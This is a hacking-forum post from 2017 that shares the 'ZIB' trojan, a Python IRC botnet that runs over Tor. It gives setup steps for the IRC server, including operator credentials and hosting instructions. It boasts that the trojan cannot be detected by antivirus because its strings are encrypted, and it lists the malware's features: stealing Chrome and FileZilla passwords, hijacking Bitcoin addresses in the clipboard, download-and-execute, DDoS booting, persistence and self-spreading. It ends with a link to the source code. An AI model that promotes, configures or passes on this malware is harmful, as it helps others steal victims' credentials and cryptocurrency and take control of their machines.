Miscellaneous Leaks

ZIB-Trojan

Submitted by sam3oul, , Thread ID: 43044

Thread Closed
06-08-2017, 01:56 PM
#1
The Open Tor Botnet (ZIB) Python-based forever-FUD IRC Trojan

[Image: D3jzjW0.jpg?1]

ZIB is fully undetectable and bypasses all antivirus by running on top of Python27s pyinstaller, which is used for many legitimate programs. The only possibility of detection comes from the script, however, the script contains randomized-looking data through using a randomized AES key and initialization vector.

ZIB.py is the main project file. It has 2 errors so nobody who isnt qualified will compile it and do something hazardous.

* intel.py is the chat bot.
* compileZIB.py is used by intel.py, started with chp.exe to run in the background..
* ZIB_imports.txt contains all the imports for ZIB to use. Theyre appended to the script when compiling.
* btcpurchases.txt includes all the bitcoin payments that are pending. Ones older than 24 hours are deleted.
* channels.txt includes all completed BTC payments.
* You want to point your webserver to dist\ for hosting the files.
* chp.exe is required in the local dir.
* For the IRC server, run bircd, set up an oper with the username Zlo and password RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$. For the max users per ip set to 0 because tor users will look like 127.0.0.1Keep all scripts in Python27/Scripts.
* Put nircmd in the local directory for editing file dates.


- Features

* ZIB is a IRC-based, Bitcoin-funded bot network that runs under Tor for anonymity.
* ZIB is coded totally from scratch and not built on top of someone elses source code.
* ZIB uses the Department of Defense standard for encryption of Top Sercret files as one of its methods of making its binaries fully undetectable every time!
* ZIB stands for Zlo is a Botnet. Zlo means evil in Russian. (actually ZIB stands for ZIB is a Botnet a self-referencing acronym)
* ZIB creates a new binary for every user, with different file sizes, creation dates, and rot13->zlib->base64->AES-256(random key+IV) encrypted strings.
* ZIB is 100% fully undetectable (FUD) to Anti-Virus.
* ZIB has an automated system for handling payments, providing bot-net binaries, and creating bot-net IRC channels.
* All bot networks on the ZIB network require a password to join.
* ZIB uses passworded user-based authentication, handled through our Zlo intel bot, so you dont have to worry about people stealing your channel password, main password, or bots. Normal users cant create their own channels. All IRC functionalities are handled by the Zlo IRC intelligence bot. You can do authenticated, single bot commands through Zlo, or set up a user session on your bots, which is slightly less secure.
* Paid users get unlimited bot space per channel.
* Our bot has been tested on and is fully compatible with Windows Server 2008 R2 32-bit, Windows XP SP1 & SP3 32-bit, Windows 7, and Windows 8 64-bit.
* Download & Execute w/ optional SHA256 verification.
* Update w/ optional SHA256 verification.
* Chrome password recovery.
* Each bot can act as a shell booter and use php shells to hit with.
* Replace Bitcoin addresses in clipboard with yours.
* FileZilla password recovery.
* Fully routed through Tor.
* File persistence, registry persistence, startup folder persistence, process persistence, tor process & file persistence.
* Completely hidden.
0/60 Fully undetectable to Antivirus.
* File download/upload.
* Process status, starter, and killer.
* Undetectable, instant obfuscation when generating new binaries FREE!
Self spreading.
* All bot files are verified via hash check. Broken/corrupted files get re-placed.
* Bypasses AntiVirus Deep-Scan.
* Bot location changes, depending on administrative access.....

Download & Source :
[b]https://github.com/whitepacket/ZIB-T...ster/README.md
[/b]

Users browsing this thread: 2 Guest(s)